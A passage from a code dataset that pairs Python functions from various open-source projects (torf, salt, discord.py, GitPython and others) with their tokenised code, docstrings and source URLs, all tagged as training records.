    :param id_evip: Vip environment identifier.

    :return: Dictionary with the following structure:

    ::

        {'ip': {'ip': < ip - octs for ipv4, blocks for ipv6 - >,
        'id': <id>, 'network4 or network6'}}.

    :raise IpNaoExisteError: Ipv4 or Ipv6 not found.
    :raise EnvironemntVipNotFoundError: Vip environment not found.
    :raise IPNaoDisponivelError: Ip not available for Vip Environment.
    :raise UserNotAuthorizedError: User does not have permission to perform the operation.
    :raise InvalidParameterError: Ip string or vip environment is none or invalid.
    :raise XMLError: Networkapi failed to generate the XML response.
    :raise DataBaseError: Networkapi failed to access the database.
    """
    ip_map = dict()
    ip_map['ip'] = ip
    ip_map['id_evip'] = id_evip

    url = "ip/checkvipip/"

    code, xml = self.submit({'ip_map': ip_map}, 'POST', url)
    return self.response(code, xml)
[ "def", "check_vip_ip", "(", "self", ",", "ip", ",", "id_evip", ")", ":", "ip_map", "=", "dict", "(", ")", "ip_map", "[", "'ip'", "]", "=", "ip", "ip_map", "[", "'id_evip'", "]", "=", "id_evip", "url", "=", "\"ip/checkvipip/\"", "code", ",", "xml", "=", "self", ".", "submit", "(", "{", "'ip_map'", ":", "ip_map", "}", ",", "'POST'", ",", "url", ")", "return", "self", ".", "response", "(", "code", ",", "xml", ")" ]
Get an IPv4 or IPv6 for a Vip request

:param ip: IPv4 or IPv6. 'xxx.xxx.xxx.xxx or xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx'

:return: Dictionary with the following structure:

::

    {'ip': {'ip': < ip - octs for ipv4, blocks for ipv6 - >,
    'id': <id>, 'network4 or network6'}}.

:raise IpNaoExisteError: Ipv4 or Ipv6 not found.
:raise EnvironemntVipNotFoundError: Vip environment not found.
:raise IPNaoDisponivelError: Ip not available for Vip Environment.
:raise UserNotAuthorizedError: User does not have permission to perform the operation.
:raise InvalidParameterError: Ip string or vip environment is none or invalid.
:raise XMLError: Networkapi failed to generate the XML response.
:raise DataBaseError: Networkapi failed to access the database.
[ "Get", "a", "Ipv4", "or", "Ipv6", "for", "Vip", "request" ]
python
train
ulfalizer/Kconfiglib
examples/print_config_tree.py
https://github.com/ulfalizer/Kconfiglib/blob/9fe13c03de16c341cd7ed40167216207b821ea50/examples/print_config_tree.py#L104-L154
def node_str(node):
    """
    Returns the complete menu entry text for a menu node, or "" for invisible
    menu nodes. Invisible menu nodes are those that lack a prompt or that do
    not have a satisfied prompt condition.

    Example return value: "[*] Bool symbol (BOOL)"

    The symbol name is printed in parentheses to the right of the prompt.
    """
    if not node.prompt:
        return ""

    # Even for menu nodes for symbols and choices, it's wrong to check
    # Symbol.visibility / Choice.visibility here. The reason is that a symbol
    # (and a choice, in theory) can be defined in multiple locations, giving it
    # multiple menu nodes, which do not necessarily all have the same prompt
    # visibility. Symbol.visibility / Choice.visibility is calculated as the OR
    # of the visibility of all the prompts.
    prompt, prompt_cond = node.prompt
    if not expr_value(prompt_cond):
        return ""

    if node.item == MENU:
        return "    " + prompt

    if node.item == COMMENT:
        return "    *** {} ***".format(prompt)

    # Symbol or Choice
    sc = node.item

    if sc.type == UNKNOWN:
        # Skip symbols defined without a type (these are obscure and generate
        # a warning)
        return ""

    # Add help text
    if WITH_HELP_DESC:
        prompt += ' - ' + str(node.help).replace('\n', ' ').replace('\r', '')

    # {:3} sets the field width to three. Gives nice alignment for empty string
    # values.
    res = "{:3} {}".format(value_str(sc), prompt)

    # Don't print the name for unnamed choices (the normal kind)
    if sc.name is not None:
        res += " ({})".format(sc.name)

    return res
[ "def", "node_str", "(", "node", ")", ":", "if", "not", "node", ".", "prompt", ":", "return", "\"\"", "# Even for menu nodes for symbols and choices, it's wrong to check", "# Symbol.visibility / Choice.visibility here. The reason is that a symbol", "# (and a choice, in theory) can be defined in multiple locations, giving it", "# multiple menu nodes, which do not necessarily all have the same prompt", "# visibility. Symbol.visibility / Choice.visibility is calculated as the OR", "# of the visibility of all the prompts.", "prompt", ",", "prompt_cond", "=", "node", ".", "prompt", "if", "not", "expr_value", "(", "prompt_cond", ")", ":", "return", "\"\"", "if", "node", ".", "item", "==", "MENU", ":", "return", "\" \"", "+", "prompt", "if", "node", ".", "item", "==", "COMMENT", ":", "return", "\" *** {} ***\"", ".", "format", "(", "prompt", ")", "# Symbol or Choice", "sc", "=", "node", ".", "item", "if", "sc", ".", "type", "==", "UNKNOWN", ":", "# Skip symbols defined without a type (these are obscure and generate", "# a warning)", "return", "\"\"", "# Add help text", "if", "WITH_HELP_DESC", ":", "prompt", "+=", "' - '", "+", "str", "(", "node", ".", "help", ")", ".", "replace", "(", "'\\n'", ",", "' '", ")", ".", "replace", "(", "'\\r'", ",", "''", ")", "# {:3} sets the field width to three. Gives nice alignment for empty string", "# values.", "res", "=", "\"{:3} {}\"", ".", "format", "(", "value_str", "(", "sc", ")", ",", "prompt", ")", "# Don't print the name for unnamed choices (the normal kind)", "if", "sc", ".", "name", "is", "not", "None", ":", "res", "+=", "\" ({})\"", ".", "format", "(", "sc", ".", "name", ")", "return", "res" ]
Returns the complete menu entry text for a menu node, or "" for invisible menu nodes. Invisible menu nodes are those that lack a prompt or that do not have a satisfied prompt condition.

Example return value: "[*] Bool symbol (BOOL)"

The symbol name is printed in parentheses to the right of the prompt.
[ "Returns", "the", "complete", "menu", "entry", "text", "for", "a", "menu", "node", "or", "for", "invisible", "menu", "nodes", ".", "Invisible", "menu", "nodes", "are", "those", "that", "lack", "a", "prompt", "or", "that", "do", "not", "have", "a", "satisfied", "prompt", "condition", "." ]
python
train
rndusr/torf
torf/_torrent.py
https://github.com/rndusr/torf/blob/df0363232daacd3f8c91aafddaa0623b8c28cbd2/torf/_torrent.py#L966-L988
def read(cls, filepath, validate=True):
    """
    Read torrent metainfo from file

    :param filepath: Path of the torrent file
    :param bool validate: Whether to run :meth:`validate` on the new Torrent object

    :raises ReadError: if reading from `filepath` fails
    :raises ParseError: if `filepath` does not contain a valid bencoded byte string
    :raises MetainfoError: if `validate` is `True` and the read metainfo is invalid

    :return: New Torrent object
    """
    try:
        with open(filepath, 'rb') as fh:
            return cls.read_stream(fh)
    except (OSError, error.ReadError) as e:
        raise error.ReadError(e.errno, filepath)
    except error.ParseError:
        raise error.ParseError(filepath)
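A hedged usage sketch, assuming the `torf` package re-exports `Torrent`, `ReadError` and `ParseError` at the top level; the file name is a placeholder:

import torf

try:
    torrent = torf.Torrent.read('example.torrent')
except (torf.ReadError, torf.ParseError) as e:
    # ReadError covers I/O failures; ParseError covers invalid bencoded data.
    print('could not load torrent:', e)
else:
    print(torrent.name)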
[ "def", "read", "(", "cls", ",", "filepath", ",", "validate", "=", "True", ")", ":", "try", ":", "with", "open", "(", "filepath", ",", "'rb'", ")", "as", "fh", ":", "return", "cls", ".", "read_stream", "(", "fh", ")", "except", "(", "OSError", ",", "error", ".", "ReadError", ")", "as", "e", ":", "raise", "error", ".", "ReadError", "(", "e", ".", "errno", ",", "filepath", ")", "except", "error", ".", "ParseError", ":", "raise", "error", ".", "ParseError", "(", "filepath", ")" ]
Read torrent metainfo from file

:param filepath: Path of the torrent file
:param bool validate: Whether to run :meth:`validate` on the new Torrent object

:raises ReadError: if reading from `filepath` fails
:raises ParseError: if `filepath` does not contain a valid bencoded byte string
:raises MetainfoError: if `validate` is `True` and the read metainfo is invalid

:return: New Torrent object
[ "Read", "torrent", "metainfo", "from", "file" ]
python
train
BernardFW/bernard
src/bernard/platforms/telegram/platform.py
https://github.com/BernardFW/bernard/blob/9c55703e5ffe5717c9fa39793df59dbfa5b4c5ab/src/bernard/platforms/telegram/platform.py#L591-L599
async def _deferred_init(self):
    """
    Register the web hook onto which Telegram should send its messages.
    """
    hook_path = self.make_hook_path()
    url = urljoin(settings.BERNARD_BASE_URL, hook_path)
    await self.call('setWebhook', url=url)
    logger.info('Setting Telegram webhook to "%s"', url)
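`urljoin` semantics matter here: the base URL's trailing slash decides whether the hook path extends or replaces the last path segment (and a leading slash on the hook path would make it root-relative regardless). A quick stdlib illustration with placeholder URLs:

from urllib.parse import urljoin

# With a trailing slash the hook path is appended under the base path...
assert urljoin('https://bot.example.com/bernard/', 'hooks/telegram') == \
    'https://bot.example.com/bernard/hooks/telegram'
# ...without it, the last segment of the base is replaced.
assert urljoin('https://bot.example.com/bernard', 'hooks/telegram') == \
    'https://bot.example.com/hooks/telegram'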
[ "async", "def", "_deferred_init", "(", "self", ")", ":", "hook_path", "=", "self", ".", "make_hook_path", "(", ")", "url", "=", "urljoin", "(", "settings", ".", "BERNARD_BASE_URL", ",", "hook_path", ")", "await", "self", ".", "call", "(", "'setWebhook'", ",", "url", "=", "url", ")", "logger", ".", "info", "(", "'Setting Telegram webhook to \"%s\"'", ",", "url", ")" ]
Register the web hook onto which Telegram should send its messages.
[ "Register", "the", "web", "hook", "onto", "which", "Telegram", "should", "send", "its", "messages", "." ]
python
train
chrislim2888/IP2Location-Python
IP2Location.py
https://github.com/chrislim2888/IP2Location-Python/blob/6b2a7d3a5e61c9f8efda5ae96c7064f9a7714621/IP2Location.py#L342-L359
def _parse_addr(self, addr):
    ''' Parses address and returns IP version. Raises exception on invalid argument '''
    ipv = 0
    try:
        socket.inet_pton(socket.AF_INET6, addr)
        # Convert ::FFFF:x.y.z.y to IPv4
        if addr.lower().startswith('::ffff:'):
            try:
                socket.inet_pton(socket.AF_INET, addr)
                ipv = 4
            except:
                ipv = 6
        else:
            ipv = 6
    except:
        socket.inet_pton(socket.AF_INET, addr)
        ipv = 4
    return ipv
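A standalone sketch of the same detection outside the class, using only the standard `socket` module. It varies slightly from the original: for IPv4-mapped addresses it probes the embedded dotted quad (`addr[7:]`) rather than the full string, and it catches `OSError` instead of using bare excepts:

import socket

def ip_version(addr):
    # Try IPv6 first; plain IPv4 strings are not valid AF_INET6 input.
    try:
        socket.inet_pton(socket.AF_INET6, addr)
    except OSError:
        socket.inet_pton(socket.AF_INET, addr)  # raises OSError if invalid too
        return 4
    # IPv4-mapped addresses (::ffff:a.b.c.d) carry an IPv4 payload.
    if addr.lower().startswith('::ffff:'):
        try:
            socket.inet_pton(socket.AF_INET, addr[7:])
            return 4
        except OSError:
            return 6
    return 6

assert ip_version('8.8.8.8') == 4
assert ip_version('::1') == 6
assert ip_version('::ffff:192.0.2.1') == 4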
[ "def", "_parse_addr", "(", "self", ",", "addr", ")", ":", "ipv", "=", "0", "try", ":", "socket", ".", "inet_pton", "(", "socket", ".", "AF_INET6", ",", "addr", ")", "# Convert ::FFFF:x.y.z.y to IPv4", "if", "addr", ".", "lower", "(", ")", ".", "startswith", "(", "'::ffff:'", ")", ":", "try", ":", "socket", ".", "inet_pton", "(", "socket", ".", "AF_INET", ",", "addr", ")", "ipv", "=", "4", "except", ":", "ipv", "=", "6", "else", ":", "ipv", "=", "6", "except", ":", "socket", ".", "inet_pton", "(", "socket", ".", "AF_INET", ",", "addr", ")", "ipv", "=", "4", "return", "ipv" ]
Parses address and returns IP version. Raises exception on invalid argument
[ "Parses", "address", "and", "returns", "IP", "version", ".", "Raises", "exception", "on", "invalid", "argument" ]
python
train
knipknap/exscript
Exscript/stdlib/connection.py
https://github.com/knipknap/exscript/blob/72718eee3e87b345d5a5255be9824e867e42927b/Exscript/stdlib/connection.py#L278-L288
def set_timeout(scope, timeout):
    """
    Defines the time after which Exscript fails if it does not receive a
    prompt from the remote host.

    :type  timeout: int
    :param timeout: The timeout in seconds.
    """
    conn = scope.get('__connection__')
    conn.set_timeout(int(timeout[0]))
    return True
[ "def", "set_timeout", "(", "scope", ",", "timeout", ")", ":", "conn", "=", "scope", ".", "get", "(", "'__connection__'", ")", "conn", ".", "set_timeout", "(", "int", "(", "timeout", "[", "0", "]", ")", ")", "return", "True" ]
Defines the time after which Exscript fails if it does not receive a prompt from the remote host.

:type  timeout: int
:param timeout: The timeout in seconds.
[ "Defines", "the", "time", "after", "which", "Exscript", "fails", "if", "it", "does", "not", "receive", "a", "prompt", "from", "the", "remote", "host", "." ]
python
train
saltstack/salt
salt/utils/cloud.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/utils/cloud.py#L301-L344
def minion_config(opts, vm_):
    '''
    Return a minion's configuration for the provided options and VM
    '''
    # Don't start with a copy of the default minion opts; they're not always
    # what we need. Some default options are Null, let's set a reasonable default
    minion = {
        'master': 'salt',
        'log_level': 'info',
        'hash_type': 'sha256',
    }

    # Now, let's update it to our needs
    minion['id'] = vm_['name']
    master_finger = salt.config.get_cloud_config_value('master_finger', vm_, opts)
    if master_finger is not None:
        minion['master_finger'] = master_finger
    minion.update(
        # Get ANY defined minion settings, merging data, in the following order
        # 1. VM config
        # 2. Profile config
        # 3. Global configuration
        salt.config.get_cloud_config_value(
            'minion', vm_, opts, default={}, search_global=True
        )
    )

    make_master = salt.config.get_cloud_config_value('make_master', vm_, opts)
    if 'master' not in minion and make_master is not True:
        raise SaltCloudConfigError(
            'A master setting was not defined in the minion\'s configuration.'
        )

    # Get ANY defined grains settings, merging data, in the following order
    # 1. VM config
    # 2. Profile config
    # 3. Global configuration
    minion.setdefault('grains', {}).update(
        salt.config.get_cloud_config_value(
            'grains', vm_, opts, default={}, search_global=True
        )
    )
    return minion
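The merge order is the crux: hard-coded defaults, then global configuration, then profile, then the VM's own settings, with later layers winning. A minimal sketch of that precedence using plain dicts (the names are illustrative, not Salt's API):

defaults = {'master': 'salt', 'log_level': 'info', 'hash_type': 'sha256'}

def effective_minion_config(global_cfg, profile_cfg, vm_cfg):
    minion = dict(defaults)
    # Later updates win: global first, then profile, then the VM's own settings.
    for layer in (global_cfg, profile_cfg, vm_cfg):
        minion.update(layer.get('minion', {}))
    return minion

cfg = effective_minion_config(
    {'minion': {'master': 'salt.example.com'}},
    {'minion': {'log_level': 'debug'}},
    {'minion': {'id': 'web01'}},
)
assert cfg['master'] == 'salt.example.com' and cfg['log_level'] == 'debug'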
[ "def", "minion_config", "(", "opts", ",", "vm_", ")", ":", "# Don't start with a copy of the default minion opts; they're not always", "# what we need. Some default options are Null, let's set a reasonable default", "minion", "=", "{", "'master'", ":", "'salt'", ",", "'log_level'", ":", "'info'", ",", "'hash_type'", ":", "'sha256'", ",", "}", "# Now, let's update it to our needs", "minion", "[", "'id'", "]", "=", "vm_", "[", "'name'", "]", "master_finger", "=", "salt", ".", "config", ".", "get_cloud_config_value", "(", "'master_finger'", ",", "vm_", ",", "opts", ")", "if", "master_finger", "is", "not", "None", ":", "minion", "[", "'master_finger'", "]", "=", "master_finger", "minion", ".", "update", "(", "# Get ANY defined minion settings, merging data, in the following order", "# 1. VM config", "# 2. Profile config", "# 3. Global configuration", "salt", ".", "config", ".", "get_cloud_config_value", "(", "'minion'", ",", "vm_", ",", "opts", ",", "default", "=", "{", "}", ",", "search_global", "=", "True", ")", ")", "make_master", "=", "salt", ".", "config", ".", "get_cloud_config_value", "(", "'make_master'", ",", "vm_", ",", "opts", ")", "if", "'master'", "not", "in", "minion", "and", "make_master", "is", "not", "True", ":", "raise", "SaltCloudConfigError", "(", "'A master setting was not defined in the minion\\'s configuration.'", ")", "# Get ANY defined grains settings, merging data, in the following order", "# 1. VM config", "# 2. Profile config", "# 3. Global configuration", "minion", ".", "setdefault", "(", "'grains'", ",", "{", "}", ")", ".", "update", "(", "salt", ".", "config", ".", "get_cloud_config_value", "(", "'grains'", ",", "vm_", ",", "opts", ",", "default", "=", "{", "}", ",", "search_global", "=", "True", ")", ")", "return", "minion" ]
Return a minion's configuration for the provided options and VM
[ "Return", "a", "minion", "s", "configuration", "for", "the", "provided", "options", "and", "VM" ]
python
train
pyqg/pyqg
pyqg/diagnostic_tools.py
https://github.com/pyqg/pyqg/blob/4f41584a12bcbf8657785b8cb310fa5065ecabd1/pyqg/diagnostic_tools.py#L53-L86
def calc_ispec(model, ph):
    """Compute isotropic spectrum `phr` of `ph` from 2D spectrum.

    Parameters
    ----------
    model : pyqg.Model instance
        The model object from which `ph` originates
    ph : complex array
        The field on which to compute the variance

    Returns
    -------
    kr : array
        isotropic wavenumber
    phr : array
        isotropic spectrum
    """
    if model.kk.max() > model.ll.max():
        kmax = model.ll.max()
    else:
        kmax = model.kk.max()

    # create radial wavenumber
    dkr = np.sqrt(model.dk**2 + model.dl**2)
    kr = np.arange(dkr/2., kmax + dkr, dkr)
    phr = np.zeros(kr.size)

    for i in range(kr.size):
        fkr = (model.wv >= kr[i] - dkr/2) & (model.wv <= kr[i] + dkr/2)
        dth = pi / (fkr.sum() - 1)
        phr[i] = ph[fkr].sum() * kr[i] * dth

    return kr, phr
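The binning loop is plain radial averaging; a self-contained numpy sketch on a synthetic grid (standalone, not using a pyqg model; grid sizes are arbitrary) shows the same kr construction and ring summation:

import numpy as np

# Synthetic spectral grid standing in for model.kk / model.ll.
dk = dl = 1.0
kk = np.arange(0, 33) * dk
ll = np.fft.fftfreq(64, d=1.0 / 64) * dl
k2d, l2d = np.meshgrid(kk, ll)
wv = np.sqrt(k2d**2 + l2d**2)          # model.wv analogue
ph = np.exp(-wv**2 / 50.0)             # toy 2D spectrum

kmax = min(kk.max(), np.abs(ll).max())
dkr = np.sqrt(dk**2 + dl**2)
kr = np.arange(dkr / 2.0, kmax + dkr, dkr)
phr = np.zeros(kr.size)
for i in range(kr.size):
    ring = (wv >= kr[i] - dkr / 2) & (wv <= kr[i] + dkr / 2)
    dth = np.pi / (ring.sum() - 1)      # angular increment over the half-plane
    phr[i] = ph[ring].sum() * kr[i] * dth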
[ "def", "calc_ispec", "(", "model", ",", "ph", ")", ":", "if", "model", ".", "kk", ".", "max", "(", ")", ">", "model", ".", "ll", ".", "max", "(", ")", ":", "kmax", "=", "model", ".", "ll", ".", "max", "(", ")", "else", ":", "kmax", "=", "model", ".", "kk", ".", "max", "(", ")", "# create radial wavenumber", "dkr", "=", "np", ".", "sqrt", "(", "model", ".", "dk", "**", "2", "+", "model", ".", "dl", "**", "2", ")", "kr", "=", "np", ".", "arange", "(", "dkr", "/", "2.", ",", "kmax", "+", "dkr", ",", "dkr", ")", "phr", "=", "np", ".", "zeros", "(", "kr", ".", "size", ")", "for", "i", "in", "range", "(", "kr", ".", "size", ")", ":", "fkr", "=", "(", "model", ".", "wv", ">=", "kr", "[", "i", "]", "-", "dkr", "/", "2", ")", "&", "(", "model", ".", "wv", "<=", "kr", "[", "i", "]", "+", "dkr", "/", "2", ")", "dth", "=", "pi", "/", "(", "fkr", ".", "sum", "(", ")", "-", "1", ")", "phr", "[", "i", "]", "=", "ph", "[", "fkr", "]", ".", "sum", "(", ")", "*", "kr", "[", "i", "]", "*", "dth", "return", "kr", ",", "phr" ]
Compute isotropic spectrum `phr` of `ph` from 2D spectrum.

Parameters
----------
model : pyqg.Model instance
    The model object from which `ph` originates
ph : complex array
    The field on which to compute the variance

Returns
-------
kr : array
    isotropic wavenumber
phr : array
    isotropic spectrum
[ "Compute", "isotropic", "spectrum", "phr", "of", "ph", "from", "2D", "spectrum", "." ]
python
train
googledatalab/pydatalab
google/datalab/stackdriver/commands/_monitoring.py
https://github.com/googledatalab/pydatalab/blob/d9031901d5bca22fe0d5925d204e6698df9852e1/google/datalab/stackdriver/commands/_monitoring.py#L102-L108
def _monitoring_groups_list(args, _):
    """Lists the groups in the project."""
    project_id = args['project']
    pattern = args['name'] or '*'
    groups = gcm.Groups(context=_make_context(project_id))
    dataframe = groups.as_dataframe(pattern=pattern)
    return _render_dataframe(dataframe)
[ "def", "_monitoring_groups_list", "(", "args", ",", "_", ")", ":", "project_id", "=", "args", "[", "'project'", "]", "pattern", "=", "args", "[", "'name'", "]", "or", "'*'", "groups", "=", "gcm", ".", "Groups", "(", "context", "=", "_make_context", "(", "project_id", ")", ")", "dataframe", "=", "groups", ".", "as_dataframe", "(", "pattern", "=", "pattern", ")", "return", "_render_dataframe", "(", "dataframe", ")" ]
Lists the groups in the project.
[ "Lists", "the", "groups", "in", "the", "project", "." ]
python
train
shoppimon/figcan
figcan/figcan.py
https://github.com/shoppimon/figcan/blob/bdfa59ceed33277c060fc009fbf44c41b9852681/figcan/figcan.py#L109-L130
def _recursive_merge(dct, merge_dct, raise_on_missing):
    # type: (Dict[str, Any], Dict[str, Any], bool) -> Dict[str, Any]
    """Recursive dict merge

    This modifies `dct` in place. Use `copy.deepcopy` if this behavior is not desired.
    """
    for k, v in merge_dct.items():
        if k in dct:
            if isinstance(dct[k], dict) and isinstance(merge_dct[k], BaseMapping):
                dct[k] = _recursive_merge(dct[k], merge_dct[k], raise_on_missing)
            else:
                dct[k] = merge_dct[k]
        elif isinstance(dct, Extensible):
            dct[k] = merge_dct[k]
        else:
            message = "Unknown configuration key: '{k}'".format(k=k)
            if raise_on_missing:
                raise KeyError(message)
            else:
                logging.getLogger(__name__).warning(message)
    return dct
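Stripped of the Figcan-specific types (`BaseMapping`, `Extensible`), the control flow is an ordinary recursive dict merge that rejects keys absent from the base. A plain-dict sketch of that core:

def merge_strict(dct, merge_dct):
    for k, v in merge_dct.items():
        if k in dct:
            if isinstance(dct[k], dict) and isinstance(v, dict):
                dct[k] = merge_strict(dct[k], v)  # descend into nested sections
            else:
                dct[k] = v  # leaf override
        else:
            raise KeyError("Unknown configuration key: '{k}'".format(k=k))
    return dct

base = {'db': {'host': 'localhost', 'port': 5432}, 'debug': False}
merge_strict(base, {'db': {'port': 5433}})
assert base['db']['port'] == 5433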
[ "def", "_recursive_merge", "(", "dct", ",", "merge_dct", ",", "raise_on_missing", ")", ":", "# type: (Dict[str, Any], Dict[str, Any], bool) -> Dict[str, Any]", "for", "k", ",", "v", "in", "merge_dct", ".", "items", "(", ")", ":", "if", "k", "in", "dct", ":", "if", "isinstance", "(", "dct", "[", "k", "]", ",", "dict", ")", "and", "isinstance", "(", "merge_dct", "[", "k", "]", ",", "BaseMapping", ")", ":", "dct", "[", "k", "]", "=", "_recursive_merge", "(", "dct", "[", "k", "]", ",", "merge_dct", "[", "k", "]", ",", "raise_on_missing", ")", "else", ":", "dct", "[", "k", "]", "=", "merge_dct", "[", "k", "]", "elif", "isinstance", "(", "dct", ",", "Extensible", ")", ":", "dct", "[", "k", "]", "=", "merge_dct", "[", "k", "]", "else", ":", "message", "=", "\"Unknown configuration key: '{k}'\"", ".", "format", "(", "k", "=", "k", ")", "if", "raise_on_missing", ":", "raise", "KeyError", "(", "message", ")", "else", ":", "logging", ".", "getLogger", "(", "__name__", ")", ".", "warning", "(", "message", ")", "return", "dct" ]
Recursive dict merge

This modifies `dct` in place. Use `copy.deepcopy` if this behavior is not desired.
[ "Recursive", "dict", "merge" ]
python
train
Rapptz/discord.py
discord/guild.py
https://github.com/Rapptz/discord.py/blob/05d4f7f9620ef33635d6ac965b26528e09cdaf5b/discord/guild.py#L379-L385
def system_channel(self):
    """Optional[:class:`TextChannel`]: Returns the guild's channel used for
    system messages. Currently this is only for new member joins.

    If no channel is set, then this returns ``None``.
    """
    channel_id = self._system_channel_id
    return channel_id and self._channels.get(channel_id)
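Typical consumer code, sketched as a discord.py event handler (the welcome text is illustrative); the `and` in the property means callers still get `None` when no system channel is configured:

import discord

class WelcomeClient(discord.Client):
    async def on_member_join(self, member):
        channel = member.guild.system_channel  # may be None
        if channel is not None:
            await channel.send('Welcome, {}!'.format(member.mention))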
[ "def", "system_channel", "(", "self", ")", ":", "channel_id", "=", "self", ".", "_system_channel_id", "return", "channel_id", "and", "self", ".", "_channels", ".", "get", "(", "channel_id", ")" ]
Optional[:class:`TextChannel`]: Returns the guild's channel used for system messages. Currently this is only for new member joins. If no channel is set, then this returns ``None``.
[ "Optional", "[", ":", "class", ":", "TextChannel", "]", ":", "Returns", "the", "guild", "s", "channel", "used", "for", "system", "messages", "." ]
python
train
Arvedui/picuplib
picuplib/upload.py
https://github.com/Arvedui/picuplib/blob/c8a5d1542dbd421e84afd5ee81fe76efec89fb95/picuplib/upload.py#L183-L223
def upload(apikey, picture, resize=None,
           rotation='00', noexif=False, callback=None):
    """
    prepares post for regular upload

    :param str apikey: Apikey needed for Authentication on picflash.
    :param str/tuple/list picture: Path to picture as str or picture data. \
        If data, a tuple or list with the file name as str \
        and data as byte object in that order.
    :param str resize: A resolution in the following format: \
        '80x80' (optional)
    :param str|degree rotation: The picture will be rotated by this value. \
        Allowed values are 00, 90, 180, 270. (optional)
    :param boolean noexif: set to True when exif data should be purged. (optional)
    :param function callback: function which will be called after every read. \
        Needs to take one argument. You can use the len function to determine \
        the body length and call bytes_read().
    """
    if isinstance(picture, str):
        with open(picture, 'rb') as file_obj:
            picture_name = picture
            data = file_obj.read()
    elif isinstance(picture, (tuple, list)):
        picture_name = picture[0]
        data = picture[1]
    else:
        raise TypeError("The second argument must be str or list/tuple. "
                        "Please refer to the documentation for details.")

    check_rotation(rotation)
    check_resize(resize)
    check_callback(callback)

    post_data = compose_post(apikey, resize, rotation, noexif)
    post_data['Datei[]'] = (punify_filename(basename(picture_name)), data)

    return do_upload(post_data, callback)
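A hedged usage sketch, assuming the function is importable from the `picuplib.upload` module shown in the path; the API key and file name are placeholders:

from picuplib.upload import upload

# Upload from a path, resized to 800x600, rotated 90 degrees, with EXIF stripped.
result = upload('YOUR_API_KEY', 'photo.jpg', resize='800x600',
                rotation='90', noexif=True)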
[ "def", "upload", "(", "apikey", ",", "picture", ",", "resize", "=", "None", ",", "rotation", "=", "'00'", ",", "noexif", "=", "False", ",", "callback", "=", "None", ")", ":", "if", "isinstance", "(", "picture", ",", "str", ")", ":", "with", "open", "(", "picture", ",", "'rb'", ")", "as", "file_obj", ":", "picture_name", "=", "picture", "data", "=", "file_obj", ".", "read", "(", ")", "elif", "isinstance", "(", "picture", ",", "(", "tuple", ",", "list", ")", ")", ":", "picture_name", "=", "picture", "[", "0", "]", "data", "=", "picture", "[", "1", "]", "else", ":", "raise", "TypeError", "(", "\"The second argument must be str or list/tuple. \"", "\"Please refer to the documentation for details.\"", ")", "check_rotation", "(", "rotation", ")", "check_resize", "(", "resize", ")", "check_callback", "(", "callback", ")", "post_data", "=", "compose_post", "(", "apikey", ",", "resize", ",", "rotation", ",", "noexif", ")", "post_data", "[", "'Datei[]'", "]", "=", "(", "punify_filename", "(", "basename", "(", "picture_name", ")", ")", ",", "data", ")", "return", "do_upload", "(", "post_data", ",", "callback", ")" ]
prepares post for regular upload

:param str apikey: Apikey needed for Authentication on picflash.
:param str/tuple/list picture: Path to picture as str or picture data. If data, a tuple or list with the file name as str and data as byte object in that order.
:param str resize: A resolution in the following format: '80x80' (optional)
:param str|degree rotation: The picture will be rotated by this value. Allowed values are 00, 90, 180, 270. (optional)
:param boolean noexif: set to True when exif data should be purged. (optional)
:param function callback: function which will be called after every read. Needs to take one argument. You can use the len function to determine the body length and call bytes_read().
[ "prepares", "post", "for", "regular", "upload" ]
python
train
SylvanasSun/FishFishJump
fish_searcher/views/search.py
https://github.com/SylvanasSun/FishFishJump/blob/696212d242d8d572f3f1b43925f3d8ab8acc6a2d/fish_searcher/views/search.py#L131-L147
def generate_key(url, page_number):
    """
    >>> url_a = 'http://localhost:5009/search?keywords=a'
    >>> generate_key(url_a, 10)
    'http://localhost:5009/search?keywords=a&page=10'
    >>> url_b = 'http://localhost:5009/search?keywords=b&page=1'
    >>> generate_key(url_b, 10)
    'http://localhost:5009/search?keywords=b&page=10'
    """
    index = url.rfind('page')
    if index != -1:
        result = url[0:index]
        result += 'page=%s' % page_number
    else:
        result = url
        result += '&page=%s' % page_number
    return result
[ "def", "generate_key", "(", "url", ",", "page_number", ")", ":", "index", "=", "url", ".", "rfind", "(", "'page'", ")", "if", "index", "!=", "-", "1", ":", "result", "=", "url", "[", "0", ":", "index", "]", "result", "+=", "'page=%s'", "%", "page_number", "else", ":", "result", "=", "url", "result", "+=", "'&page=%s'", "%", "page_number", "return", "result" ]
>>> url_a = 'http://localhost:5009/search?keywords=a'
>>> generate_key(url_a, 10)
'http://localhost:5009/search?keywords=a&page=10'
>>> url_b = 'http://localhost:5009/search?keywords=b&page=1'
>>> generate_key(url_b, 10)
'http://localhost:5009/search?keywords=b&page=10'
[ ">>>", "url_a", "=", "http", ":", "//", "localhost", ":", "5009", "/", "search?keywords", "=", "a", ">>>", "generate_key", "(", "url_a", "10", ")", "http", ":", "//", "localhost", ":", "5009", "/", "search?keywords", "=", "a&page", "=", "10", ">>>", "url_b", "=", "http", ":", "//", "localhost", ":", "5009", "/", "search?keywords", "=", "b&page", "=", "1", ">>>", "generate_key", "(", "url_b", "10", ")", "http", ":", "//", "localhost", ":", "5009", "/", "search?keywords", "=", "b&page", "=", "10" ]
python
train
gitpython-developers/GitPython
git/index/fun.py
https://github.com/gitpython-developers/GitPython/blob/1f66e25c25cde2423917ee18c4704fff83b837d1/git/index/fun.py#L111-L156
def write_cache(entries, stream, extension_data=None, ShaStreamCls=IndexFileSHA1Writer):
    """Write the cache represented by entries to a stream

    :param entries: **sorted** list of entries
    :param stream: stream to wrap into the AdapterStreamCls - it is used for
        final output.
    :param ShaStreamCls: Type to use when writing to the stream. It produces
        a sha while writing to it, before the data is passed on to
        the wrapped stream
    :param extension_data: any kind of data to write as a trailer, it must
        begin a 4 byte identifier, followed by its size (4 bytes)"""
    # wrap the stream into a compatible writer
    stream = ShaStreamCls(stream)

    tell = stream.tell
    write = stream.write

    # header
    version = 2
    write(b"DIRC")
    write(pack(">LL", version, len(entries)))

    # body
    for entry in entries:
        beginoffset = tell()
        write(entry[4])  # ctime
        write(entry[5])  # mtime
        path = entry[3]
        path = force_bytes(path, encoding=defenc)
        plen = len(path) & CE_NAMEMASK  # path length
        assert plen == len(path), "Path %s too long to fit into index" % entry[3]
        flags = plen | (entry[2] & CE_NAMEMASK_INV)  # clear possible previous values
        write(pack(">LLLLLL20sH", entry[6], entry[7], entry[0],
                   entry[8], entry[9], entry[10], entry[1], flags))
        write(path)
        real_size = ((tell() - beginoffset + 8) & ~7)
